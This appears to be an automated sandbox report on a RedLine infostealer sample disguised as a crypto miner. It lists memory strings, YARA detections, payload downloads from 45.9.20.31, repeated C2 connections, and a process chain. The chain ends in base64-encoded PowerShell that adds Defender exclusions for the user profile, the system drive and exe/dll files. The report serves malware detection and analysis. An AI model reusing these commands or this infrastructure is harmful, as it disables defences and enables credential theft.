                    Source: InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                    Source: InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                    Source: InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.659905866.0000000002FA6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                    Source: InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                    Source: InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                    Source: InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                    Source: InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                    Source: InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                    Source: InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                    Source: InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.657986199.0000000002DFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                    Source: InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                    Source: InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                    Source: InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                    Source: InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                    Source: InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                    Source: InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                    Source: InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                    Source: InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                    Source: CryptoMiner.exeString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                    Source: CryptoMiner.exeString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                    Source: CryptoMiner.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                    Source: powershell.exe, 0000001D.00000002.698158911.000001C92E7EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: InstallUtil.exe, 0000000C.00000002.659673561.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, fname.exe.12.drString found in binary or memory: http://www.digicert.com/CPS0
                    Source: fname.exe.12.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                    Source: fname.exe.12.drString found in binary or memory: http://www.symauth.com/cps0(
                    Source: fname.exe.12.drString found in binary or memory: http://www.symauth.com/rpa00
                    Source: fname.exe.12.drString found in binary or memory: http://www.vmware.com/0
                    Source: InstallUtil.exe, 0000000C.00000002.659673561.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, fname.exe.12.drString found in binary or memory: http://www.vmware.com/0/
                    Source: InstallUtil.exe, 0000000C.00000003.616449035.000000000409D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.662663297.00000000031A8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.662472558.0000000003191000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.664565017.0000000003EC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: CryptoMiner.exe, 00000000.00000003.538097603.000000000D730000.00000004.00000800.00020000.00000000.sdmp, CryptoMiner.exe, 00000000.00000003.543077511.000000000D732000.00000040.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000000.543024251.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
                    Source: InstallUtil.exe, 0000000C.00000003.616449035.000000000409D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.662663297.00000000031A8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.662472558.0000000003191000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.664565017.0000000003EC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: powershell.exe, 0000001D.00000002.711559950.000001C93E640000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 0000001D.00000002.711559950.000001C93E640000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 0000001D.00000002.711559950.000001C93E640000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: CryptoMiner.exe, fname.exe.12.drString found in binary or memory: https://d.symcb.com/cps0%
                    Source: CryptoMiner.exe, fname.exe.12.drString found in binary or memory: https://d.symcb.com/rpa0
                    Source: CryptoMiner.exeString found in binary or memory: https://d.symcb.com/rpa0.
                    Source: InstallUtil.exe, 0000000C.00000003.616449035.000000000409D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.662663297.00000000031A8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.662472558.0000000003191000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.664565017.0000000003EC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: InstallUtil.exe, 0000000C.00000003.616449035.000000000409D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.662663297.00000000031A8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.662472558.0000000003191000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.664565017.0000000003EC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: InstallUtil.exe, 0000000C.00000003.616449035.000000000409D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.662663297.00000000031A8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.662472558.0000000003191000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.664565017.0000000003EC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: powershell.exe, 0000001D.00000002.698158911.000001C92E7EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 0000001D.00000002.711559950.000001C93E640000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: InstallUtil.exe, 0000000C.00000002.659673561.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, fname.exe.12.drString found in binary or memory: https://pidgin.im0
                    Source: InstallUtil.exe, 0000000C.00000003.616449035.000000000409D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.662663297.00000000031A8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.662472558.0000000003191000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.664565017.0000000003EC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                    Source: InstallUtil.exe, 0000000C.00000003.616449035.000000000409D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.662663297.00000000031A8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.662472558.0000000003191000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.664565017.0000000003EC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: InstallUtil.exe, 0000000C.00000002.659673561.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, fname.exe.12.drString found in binary or memory: https://sectigo.com/CPS0
                    Source: InstallUtil.exe, 0000000C.00000002.659673561.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, fname.exe.12.drString found in binary or memory: https://www.digicert.com/CPS0
                    Source: InstallUtil.exe, 0000000C.00000003.616449035.000000000409D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.662663297.00000000031A8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.662472558.0000000003191000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.664565017.0000000003EC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: unknownDNS traffic detected: queries for: ip-api.com
                    Source: global trafficHTTP traffic detected: GET /asdasdasd.exe HTTP/1.1Host: 45.9.20.31Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /rigx.exe HTTP/1.1Host: 45.9.20.31
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.21.213.209

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.3.CryptoMiner.exe.d730000.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 12.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 12.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.CryptoMiner.exe.ae3760.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.3.CryptoMiner.exe.d730000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.3.CryptoMiner.exe.d730000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.CryptoMiner.exe.ae3760.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 12.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000000.00000003.538097603.000000000D730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: 0_2_00DA98E4
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: 0_2_00E0A04F
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: 0_2_00DA7901
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: 0_2_00D9E2DE
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: 0_2_00DA8A7F
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: 0_2_00D97221
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: 0_2_00DA83A3
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: 0_2_00DA7E52
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: 0_2_00DA6F87
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 12_2_06977328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 12_2_06977008
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 12_2_06970040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 12_2_06975170
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 12_2_0697E838
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 12_2_0697F5C2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 12_2_06979210
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 12_2_06CD8CC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 12_2_06CD9940
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 12_2_06CD17B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 12_2_06CD0768
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 12_2_06CD076A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 12_2_06CD925D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 12_2_06CD8CB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 12_2_06CD6961
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 12_2_06CD6970
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 12_2_06CD2938
                    Source: C:\Users\user\AppData\Local\Temp\fname.exeCode function: 20_2_00CDD2AF
                    Source: C:\Users\user\AppData\Local\Temp\fname.exeCode function: 20_2_00CB2247
                    Source: C:\Users\user\AppData\Local\Temp\fname.exeCode function: 20_2_00DD7CC0
                    Source: C:\Users\user\AppData\Local\Temp\fname.exeCode function: 20_2_00CB40A4
                    Source: C:\Users\user\AppData\Local\Temp\fname.exeCode function: 20_2_00DD9903
                    Source: C:\Users\user\AppData\Local\Temp\fname.exeCode function: 20_2_00DCCA92
                    Source: C:\Users\user\AppData\Local\Temp\fname.exeCode function: 20_2_00DD97E3
                    Source: C:\Users\user\AppData\Local\Temp\fname.exeCode function: 20_2_00DC57E3
                    Source: C:\Users\user\AppData\Local\Temp\fname.exeCode function: 20_2_00DC83A0
                    Source: C:\Users\user\AppData\Local\Temp\fname.exeCode function: 20_2_00CDF721
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 22_2_06E51499
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 22_2_06E5C3D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 22_2_06E5E330
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 22_2_06E5CCA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 22_2_06E51DD0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 22_2_06E50B38
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 22_2_06E50858
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 22_2_06E51590
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 22_2_06E5C088
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 22_2_06E51091
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 22_2_06E52108
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 22_2_06E51E81
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 22_2_06E50B72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 22_2_06E50B28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 22_2_09D77530
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 22_2_09D77520
                    Source: C:\Users\user\AppData\Local\Temp\filename.exeCode function: 23_2_00007FF9EFE41449
                    Source: C:\Users\user\AppData\Local\Temp\filename.exeCode function: 23_2_00007FF9EFE453A3
                    Source: C:\Users\user\AppData\Local\Temp\filename.exeCode function: 23_2_00007FF9EFE48E80
                    Source: C:\Users\user\AppData\Local\Temp\filename.exeCode function: 23_2_00007FF9EFE45543
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FF9EFE41958
                    Source: CryptoMiner.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: CryptoMiner.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: 0.3.CryptoMiner.exe.d730000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 12.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 12.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.CryptoMiner.exe.ae3760.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.3.CryptoMiner.exe.d730000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.3.CryptoMiner.exe.d730000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.CryptoMiner.exe.ae3760.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 12.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000000.00000003.538097603.000000000D730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: String function: 00D8EC50 appears 49 times
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: String function: 00D9D660 appears 38 times
                    Source: filename.exe.12.drStatic PE information: No import functions for PE file found
                    Source: CryptoMiner.exe, 00000000.00000003.538097603.000000000D730000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFlighting.exe4 vs CryptoMiner.exe
                    Source: CryptoMiner.exe, 00000000.00000003.543077511.000000000D732000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFlighting.exe4 vs CryptoMiner.exe
                    Source: CryptoMiner.exe, 00000000.00000002.548824836.0000000000E98000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBtderogatnive.exe, vs CryptoMiner.exe
                    Source: CryptoMiner.exeBinary or memory string: OriginalFilenameBtderogatnive.exe, vs CryptoMiner.exe
                    Source: CryptoMiner.exeStatic PE information: invalid certificate
                    Source: CryptoMiner.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: CryptoMiner.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\YandexJump to behavior
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@15/5@1/3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: CryptoMiner.exeReversingLabs: Detection: 16%
                    Source: C:\Users\user\Desktop\CryptoMiner.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknownProcess created: C:\Users\user\Desktop\CryptoMiner.exe "C:\Users\user\Desktop\CryptoMiner.exe"
                    Source: C:\Users\user\Desktop\CryptoMiner.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\AppData\Local\Temp\fname.exe "C:\Users\user\AppData\Local\Temp\fname.exe"
                    Source: C:\Users\user\AppData\Local\Temp\fname.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\fname.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\AppData\Local\Temp\filename.exe "C:\Users\user\AppData\Local\Temp\filename.exe"
                    Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
